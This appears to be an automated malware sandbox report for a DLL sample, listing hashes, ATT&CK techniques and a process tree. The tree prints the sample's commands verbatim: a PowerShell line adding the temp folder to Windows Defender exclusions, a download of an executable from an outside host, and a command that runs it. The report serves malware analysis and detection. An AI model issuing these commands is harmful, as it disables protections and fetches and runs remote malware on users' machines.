4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e

Resubmissions

15-12-2024 15:31

241215-syg9xaykdx 8

15-12-2024 08:28

241215-kc625synes 10

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
15-12-2024 08:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fccd129f6a5b9d2133d14922a3614f02.dll
Size

206KB
MD5

fccd129f6a5b9d2133d14922a3614f02
SHA1

e814c637e6f0c21f3aa9b43fb92cb161b4d451fc
SHA256

4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e
SHA512

c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979
SSDEEP

3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2968	powershell.exe
2728	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2968	powershell.exe
2728	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2728	powershell.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2960 wrote to memory of 2260	2960	rundll32.exe	30
PID 2960 wrote to memory of 2260	2960	rundll32.exe	30
PID 2960 wrote to memory of 2260	2960	rundll32.exe	30
PID 2960 wrote to memory of 2260	2960	rundll32.exe	30
PID 2960 wrote to memory of 2260	2960	rundll32.exe	30
PID 2960 wrote to memory of 2260	2960	rundll32.exe	30
PID 2960 wrote to memory of 2260	2960	rundll32.exe	30
PID 2260 wrote to memory of 2004	2260	rundll32.exe	32
PID 2260 wrote to memory of 2004	2260	rundll32.exe	32
PID 2260 wrote to memory of 2004	2260	rundll32.exe	32
PID 2260 wrote to memory of 2004	2260	rundll32.exe	32
PID 2004 wrote to memory of 2968	2004	cmd.exe	34
PID 2004 wrote to memory of 2968	2004	cmd.exe	34
PID 2004 wrote to memory of 2968	2004	cmd.exe	34
PID 2004 wrote to memory of 2968	2004	cmd.exe	34
PID 2260 wrote to memory of 2296	2260	rundll32.exe	35
PID 2260 wrote to memory of 2296	2260	rundll32.exe	35
PID 2260 wrote to memory of 2296	2260	rundll32.exe	35
PID 2260 wrote to memory of 2296	2260	rundll32.exe	35
PID 2296 wrote to memory of 2728	2296	cmd.exe	37
PID 2296 wrote to memory of 2728	2296	cmd.exe	37
PID 2296 wrote to memory of 2728	2296	cmd.exe	37
PID 2296 wrote to memory of 2728	2296	cmd.exe	37
PID 2260 wrote to memory of 2828	2260	rundll32.exe	38
PID 2260 wrote to memory of 2828	2260	rundll32.exe	38
PID 2260 wrote to memory of 2828	2260	rundll32.exe	38
PID 2260 wrote to memory of 2828	2260	rundll32.exe	38

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:2960
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#1
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2260
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2004
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2968
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2296
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c %temp%/eryy65ty.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
76832e612099bc6c0d79287511630190

SHA1
5f5689d93ac3f6d78bc807ab1ed7857a1ba70eb6

SHA256
e7b779350fc2b014ed1ca802604fce8f171c48b4bd240de9ca19e40dd70ddd62

SHA512
254c26789a2c222e24b65ebe758a1c2aef898f64922c15c339ce620f4d94e5fadbb4751eb76e2e6f895b9e6da5e642ae64da93fc65b6fa932772c86509876774

Download Submit
memory/2968-2-0x00000000741E1000-0x00000000741E2000-memory.dmp

Filesize
4KB

Download
memory/2968-3-0x00000000741E0000-0x000000007478B000-memory.dmp

Filesize
5.7MB

Download
memory/2968-4-0x00000000741E0000-0x000000007478B000-memory.dmp

Filesize
5.7MB

Download
memory/2968-6-0x00000000741E0000-0x000000007478B000-memory.dmp

Filesize
5.7MB

Download
memory/2968-5-0x00000000741E0000-0x000000007478B000-memory.dmp

Filesize
5.7MB

Download
memory/2968-7-0x00000000741E0000-0x000000007478B000-memory.dmp

Filesize
5.7MB

Download